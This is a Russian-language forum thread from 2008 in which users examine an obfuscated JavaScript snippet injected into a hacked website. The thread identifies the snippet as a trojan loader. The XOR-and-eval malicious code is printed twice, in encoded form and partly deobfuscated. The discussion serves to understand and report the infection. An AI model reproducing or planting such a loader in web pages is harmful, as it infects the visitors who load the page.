понять javascript

Железо, софт, сети, программирование, ремонт, настройка и обслуживание.

#1  Славка » Ср 26.03.2008, 14:45

кто понимает, объясните пожалуйста, что делает этот скрипт
http://crypta.ru:<script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') != -1) { document.writeln(''); }</script> <!-- [ 5767d39cca056b2c1b203e71515247f7 ] --><script>eval(unescape('function%20iGaFuI%28czXUp%29%7Bfunction
%20jSEG%28oxGs%29%7Bvar%20dTw%3D0%2CmDuT%2CtlHgNkZ%
3DoxGs.length%3Bfor%28mDuT%3D0%3BmDuT%3CtlHgNkZ%
3BmDuT++%29dTw+%3DoxGs.charCodeAt%28mDuT%29*
tlHgNkZ%3Breturn%20new%20String%28dTw%29%7DczXUp%3
Dunescape%28czXUp%29%3Bvar%20xGqkRq%3
Deval%28%27aNr%25g%25ufmfeYn%5EtYs%25.%5EcNa%5
ElflNe%5EeY%27.replace%28/%5BY%25Nf%5C%5E%5D/
g%2C%20%27%27%29%29.
toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/
g%2C%27%27%29%2CdFf%3DjSEG%28xGqkRq%29%2CcQGWNQE%3
Dnew%20String%28%29%2CyvDk%3D0%3BiTGBYG%3D0%3
Bfor%28var%20myw%3D0%3Bmyw%3CczXUp.length%3Bmyw++
%29%7BcQGWNQE+%3DString.fromCharCode%28czXUp.charCodeAt
%28myw%29%5E%28xGqkRq.charCodeAt%28yvDk%29%5EdFf.charCodeAt
%28iTGBYG%29%29%29%3ByvDk++%3BiTGBYG++%3Bif%28yvDk%
3ExGqkRq.length%29yvDk%3D0%3Bif%28iTGBYG%3EdFf.length
%29iTGBYG%3D0%3B%7Deval%28cQGWNQE%29%3BcQGWNQE%
3D%27%27%3Breturn%3B%7DiGaFuI%28%27%2532%2531%2538%2534%
2530%2534%2538%2534%2549%2503%2533%252b%2535%251d%257f%
256b%2517%2528%2579%2521%252e%250f%2527%2524%257f%252b%
251c%2537%2516%2512%2507%2526%253c%251a%2567%254b%2573%
2538%253f%250f%2528%256f%257d%253c%250a%2526%2508%2571%
257a%257b%2519%253e%2519%250c%2500%2538%2524%2511%2564%
2536%253c%253e%251d%2521%257f%2577%2560%250e%2532%2529%
2502%2518%2507%257d%2533%2521%2523%2544%2562%2509%252b%
2538%2511%2502%2549%2573%2502%2528%2510%2508%2507%2525%
2532%2564%2558%251c%2542%250b%254c%250f%253f%2516%250a%
2509%257e%251e%256c%254d%2551%2563%2545%256c%2535%2512%
252c%250e%250a%2504%252f%257d%257a%2565%2520%2523%2534%
2506%2531%250b%2523%2528%2571%2573%2524%2539%2532%256d%
2573%2536%2504%250c%2537%2563%253b%2509%2533%2537%2538%
2520%252c%251e%252c%251f%2521%2523%252b%2535%2523%252c%
255b%2560%2576%2529%2535%2535%253c%2575%252f%2568%2554%
257a%2557%2523%2511%253c%2530%2523%250f%2576%2506%252a%
2523%256b%256b%2503%250f%2534%253c%253d%2518%256a%2564%
253d%253d%2520%2535%2578%2531%2551%2522%2536%2511%253c%
253a%250d%2575%254c%250d%253f%2558%2512%2528%2569%2535%
2509%2574%2524%2532%2571%2508%2572%2563%256f%253e%2569%
251d%2521%2531%2573%253d%2503%254f%2503%2509%2543%257c%
2579%2519%2538%255a%2523%251c%2520%2508%2502%2522%2542%
257c%252b%2562%2531%2544%255f%256c%2537%2519%251f%2506%
2519%250c%2559%2541%250c%2524%253d%251c%251c%251b%2566%
.............................
%2567%2516%2570%2541%253c%252a%
2530%253c%2522%2514%2526%251c%2504%2557%2579%254d%27%29%3B'));</script><!-- end -->


Добавлено спустя 6 минут 35 секунд:

ой блин
Славка
постоялец
 
Сообщения: 3966
Зарегистрирован: Вт 29.08.2006, 15:19
Откуда: Иркутск

#2  Vadya corp. » Чт 27.03.2008, 11:14

Код: Выделить всё
function iGaFuI(czXUp) {
    function jSEG(oxGs) {
        var dTw = 0, mDuT, tlHgNkZ = oxGs.length;
        for (mDuT = 0; mDuT < tlHgNkZ; mDuT++) {
            dTw += oxGs.charCodeAt(mDuT) * tlHgNkZ;
        }
        return new String(dTw);
    }
    czXUp = unescape(czXUp);
    var xGqkRq = eval("aNr%g%ufmfeYn^tYs%.^cNa^lflNe^eY".replace(/[Y%Nf\^]/g, "")).toString().replace(/[^@a-z0-9A-Z_.,-]/g, ""), dFf = jSEG(xGqkRq), cQGWNQE = new String, yvDk = 0;
    iTGBYG = 0;
    for (var myw = 0; myw <czXUp> xGqkRq.length) {
            yvDk = 0;
        }
        if (iTGBYG > dFf.length) {
            iTGBYG = 0;
        }
    }
eval(cQGWNQE);
cQGWNQE = "";
return;
}


Дальше лень было :))
Если хотите пофотаться бесплатно, то пишите в личку
Аватара пользователя
Vadya corp.
постоялец
 
Сообщения: 1136
Зарегистрирован: Пт 26.05.2006, 20:02
Откуда: Иркутск

#3  Славка » Чт 27.03.2008, 11:27

Vadya corp. хех, ладно, так просто накатаю админам сайта, что у них скрипт левый на главной странице
Славка
постоялец
 
Сообщения: 3966
Зарегистрирован: Вт 29.08.2006, 15:19
Откуда: Иркутск

#4  ilkonn » Пт 28.03.2008, 5:24

Славка:кто понимает, объясните пожалуйста, что делает этот скрипт
http://crypta.ru:<script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') != -1) { document.writeln(''); }</script> <!-- [ 5767d39cca056b2c1b203e71515247f7 ] --><script>eval(unescape('function%20iGaFuI%28czXUp%29%7Bfunction
%20jSEG%28oxGs%29%7Bvar%20dTw%3D0%2CmDuT%2CtlHgNkZ%
3DoxGs.length%3Bfor%28mDuT%3D0%3BmDuT%3CtlHgNkZ%
3BmDuT++%29dTw+%3DoxGs.charCodeAt%28mDuT%29*
tlHgNkZ%3Breturn%20new%20String%28dTw%29%7DczXUp%3
Dunescape%28czXUp%29%3Bvar%20xGqkRq%3
Deval%28%27aNr%25g%25ufmfeYn%5EtYs%25.%5EcNa%5
ElflNe%5EeY%27.replace%28/%5BY%25Nf%5C%5E%5D/
g%2C%20%27%27%29%29.
toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/
g%2C%27%27%29%2CdFf%3DjSEG%28xGqkRq%29%2CcQGWNQE%3
Dnew%20String%28%29%2CyvDk%3D0%3BiTGBYG%3D0%3
Bfor%28var%20myw%3D0%3Bmyw%3CczXUp.length%3Bmyw++
%29%7BcQGWNQE+%3DString.fromCharCode%28czXUp.charCodeAt
%28myw%29%5E%28xGqkRq.charCodeAt%28yvDk%29%5EdFf.charCodeAt
%28iTGBYG%29%29%29%3ByvDk++%3BiTGBYG++%3Bif%28yvDk%
3ExGqkRq.length%29yvDk%3D0%3Bif%28iTGBYG%3EdFf.length
%29iTGBYG%3D0%3B%7Deval%28cQGWNQE%29%3BcQGWNQE%
3D%27%27%3Breturn%3B%7DiGaFuI%28%27%2532%2531%2538%2534%
2530%2534%2538%2534%2549%2503%2533%252b%2535%251d%257f%
256b%2517%2528%2579%2521%252e%250f%2527%2524%257f%252b%
251c%2537%2516%2512%2507%2526%253c%251a%2567%254b%2573%
2538%253f%250f%2528%256f%257d%253c%250a%2526%2508%2571%
257a%257b%2519%253e%2519%250c%2500%2538%2524%2511%2564%
2536%253c%253e%251d%2521%257f%2577%2560%250e%2532%2529%
2502%2518%2507%257d%2533%2521%2523%2544%2562%2509%252b%
2538%2511%2502%2549%2573%2502%2528%2510%2508%2507%2525%
2532%2564%2558%251c%2542%250b%254c%250f%253f%2516%250a%
2509%257e%251e%256c%254d%2551%2563%2545%256c%2535%2512%
252c%250e%250a%2504%252f%257d%257a%2565%2520%2523%2534%
2506%2531%250b%2523%2528%2571%2573%2524%2539%2532%256d%
2573%2536%2504%250c%2537%2563%253b%2509%2533%2537%2538%
2520%252c%251e%252c%251f%2521%2523%252b%2535%2523%252c%
255b%2560%2576%2529%2535%2535%253c%2575%252f%2568%2554%
257a%2557%2523%2511%253c%2530%2523%250f%2576%2506%252a%
2523%256b%256b%2503%250f%2534%253c%253d%2518%256a%2564%
253d%253d%2520%2535%2578%2531%2551%2522%2536%2511%253c%
253a%250d%2575%254c%250d%253f%2558%2512%2528%2569%2535%
2509%2574%2524%2532%2571%2508%2572%2563%256f%253e%2569%
251d%2521%2531%2573%253d%2503%254f%2503%2509%2543%257c%
2579%2519%2538%255a%2523%251c%2520%2508%2502%2522%2542%
257c%252b%2562%2531%2544%255f%256c%2537%2519%251f%2506%
2519%250c%2559%2541%250c%2524%253d%251c%251c%251b%2566%
.............................
%2567%2516%2570%2541%253c%252a%
2530%253c%2522%2514%2526%251c%2504%2557%2579%254d%27%29%3B'));</script><!-- end -->


Добавлено спустя 6 минут 35 секунд:

ой блин


Никуево так :twisted: скриптик. Кстати Vadya Corp ты где такое образование получал, что в пхп и явескрипте пиздато разбираешься?
Тоже хочу таким быть :D
Аватара пользователя
ilkonn
постоялец
 
Сообщения: 1531
Зарегистрирован: Пн 20.02.2006, 14:23
Откуда: ..:: ИрКуТсК ::..

#5  Славка » Пт 28.03.2008, 9:55

ilkonn это ещё не весь скрипт :roll: выяснил уже - ломанули сайт и на главной странице этот скрипт разместили, он грузит троянов
Славка
постоялец
 
Сообщения: 3966
Зарегистрирован: Вт 29.08.2006, 15:19
Откуда: Иркутск

#6  Vadya corp. » Пт 28.03.2008, 11:42

Славка Короче говоря, это строка, которая Escape'нута - то есть URI-encoded, unescape переводит ее в нормальный вид, а eval обрабатывает ее уже как javascript код.

На будущее - Firebug под Firefox показывает нормальный, отevalенный код :)

ilkonn Хехе, все сам >_< Чет как-то квантовая механика в программировании пока никак не помогла :))
Если хотите пофотаться бесплатно, то пишите в личку
Аватара пользователя
Vadya corp.
постоялец
 
Сообщения: 1136
Зарегистрирован: Пт 26.05.2006, 20:02
Откуда: Иркутск

#7  Славка » Пт 28.03.2008, 15:09

Vadya corp.:Чет как-то квантовая механика в программировании пока никак не помогла :))

=) поможет, когда кодить под квантовый комп будешь :lol:
Славка
постоялец
 
Сообщения: 3966
Зарегистрирован: Вт 29.08.2006, 15:19
Откуда: Иркутск

#8  emtec-35 » Чт 3.04.2008, 0:39

я не опытный программист, да и с русским проблемы :) но вся эта байда с "%" - вариант что это отображение папок с кириллистическим именем?
emtec-35
 
Сообщения: 15
Зарегистрирован: Ср 5.03.2008, 20:24
Откуда: Иркутск

#9  Iver » Чт 3.04.2008, 1:46

2541%250c%2524%253d%251c%251c%251b%2566%

А это что вообще. У меня иногда фронтпадж начинает вместо букав вот такое же выводить (шифрует что-ли?), Vadya corp., как эту лабуду в удобочитаемый вид привести, не руками же?
Аватара пользователя
Iver
постоялец
 
Сообщения: 171
Зарегистрирован: Чт 21.06.2007, 15:16
Откуда: не указан

#10  Vadya corp. » Сб 5.04.2008, 2:37

Iver emtec-35
http://www.nigma.ru/index.php?s=%D0%9F%D1%80%D0%B8%D0%B2%D0%B5%D1%82-%D0%BF%D1%80%D0%B8%D0%B2%D0%B5%D1%82

Ссылка такого вида ничего не напоминает? ;)
Просто весь текст переведен в другой вид, все символы заменяются своими html-сущностями (насчет html-сущностей могу ошибаться, но точно это какие-то сущности) :)
Просто ищите URI decode и будет вам щастье
Если хотите пофотаться бесплатно, то пишите в личку
Аватара пользователя
Vadya corp.
постоялец
 
Сообщения: 1136
Зарегистрирован: Пт 26.05.2006, 20:02
Откуда: Иркутск

#11  Iver » Сб 5.04.2008, 3:26

Ссылка такого вида ничего не напоминает?
Теперь напоминает, кто ж его знал.
Не знал что это URL DECODE называется, даж погуглить не мог - теперь щасье, много, много щасья!
Аватара пользователя
Iver
постоялец
 
Сообщения: 171
Зарегистрирован: Чт 21.06.2007, 15:16
Откуда: не указан

#12  Marcus » Сб 5.04.2008, 6:15

Че типа умные да декодить трех летний ребенок может -)
сам кому хочешь раскодю
Слабо tcl код декодить?

приведу пример раскодируйте... я посмотрю

Код: Выделить всё
13
dU5D+b7a:@4;?CFA!
Аватара пользователя
Marcus
постоялец
 
Сообщения: 217
Зарегистрирован: Вс 6.11.2005, 15:05
Откуда: Иркутск

#13  Vadya corp. » Сб 5.04.2008, 13:33

Marcus да, слабо :)
Если хотите пофотаться бесплатно, то пишите в личку
Аватара пользователя
Vadya corp.
постоялец
 
Сообщения: 1136
Зарегистрирован: Пт 26.05.2006, 20:02
Откуда: Иркутск

#14  Iver » Сб 5.04.2008, 16:10

Че типа умные да декодить трех летний ребенок может -)

Marcus, tcl код декодишь, а с XOR'ом наверно обломаешься *ржу не могу*
сам кому хочешь раскодю

Ну вот, раскодь, умный:
Код: Выделить всё
!нб>б+123/(б+2*74!1$+нб0/-,$#!*)0=?

Это XOR, 36 символов *ржет под столом*. Не знаю как 3х летний ребенок, но 7и летняя раскодировала при мне! :)
Аватара пользователя
Iver
постоялец
 
Сообщения: 171
Зарегистрирован: Чт 21.06.2007, 15:16
Откуда: не указан

#15  Никитин Максим » Вс 6.04.2008, 2:53

Йопта, почему ни кто не может зайти на гугл и посмотреть, почему js выглядит именно так? Ну или перелопатить хабру, чтобы вообще забить на этот код и написать свой :) ыы
Никитин Максим
 
Сообщения: 2
Зарегистрирован: Вс 6.04.2008, 2:46
Откуда: Иркутск

#16  LMsd » Вс 6.04.2008, 4:54

походу скрипт генерился серверным скриптом ) или программистом извращенцем
Мне всё равно,что вы обо мне думаете. Я о вас не думаю вообще. (с) Коко Шанель
Пишу как и. Как и так и пишу.
http://vk.com/default.xhtml
Изображение
Аватара пользователя
LMsd
постоялец
 
Сообщения: 2837
Зарегистрирован: Чт 17.05.2007, 13:38
Откуда: Боянсг

#17  Славка » Вс 6.04.2008, 12:03

Никитин Максим я просто не совсем точно сформулировал свой вопрос. Изначально мой пост выглядел иначе, не ожидал, что вставка кода будет так выглядеть. Начал расставлять переносы, надоело, просто обрезал. А хотелось знать именно алгоритм того,что делает скрипт. Я js не изучал, поэтому прошу помочь знающих людей. Если вы понимаете js, прошу пожаловать на crypta.ru только ради бога, не IE открывайте, не в курсе как ff отрегирует, я в опере туда захожу

Добавлено спустя 8 минут 16 секунд:

LMsd
LMsd:генерился серверным скриптом )
ага, изобрели ИИ и скрипт сам пишет проги. Тут скорей всего протроянен тот, у кого ftp аккаунт от сервера. Дальше дело техники. Админы сайта удаляют эту ерундовину с сайта, а она вновь появляется :lol2:
Славка
постоялец
 
Сообщения: 3966
Зарегистрирован: Вт 29.08.2006, 15:19
Откуда: Иркутск

#18  LMsd » Вс 6.04.2008, 18:39

Славка я имел ввиду что есть некий набор строк, и скрипт. в скрипт тупо вставляется строка и генерируется HTML код со скриптом, в котором твоя строка. я так делал в своё время)
Мне всё равно,что вы обо мне думаете. Я о вас не думаю вообще. (с) Коко Шанель
Пишу как и. Как и так и пишу.
http://vk.com/default.xhtml
Изображение
Аватара пользователя
LMsd
постоялец
 
Сообщения: 2837
Зарегистрирован: Чт 17.05.2007, 13:38
Откуда: Боянсг

#19  Славка » Вс 6.04.2008, 22:58

LMsd так бы и сказал
Славка
постоялец
 
Сообщения: 3966
Зарегистрирован: Вт 29.08.2006, 15:19
Откуда: Иркутск

Аватара
спонсор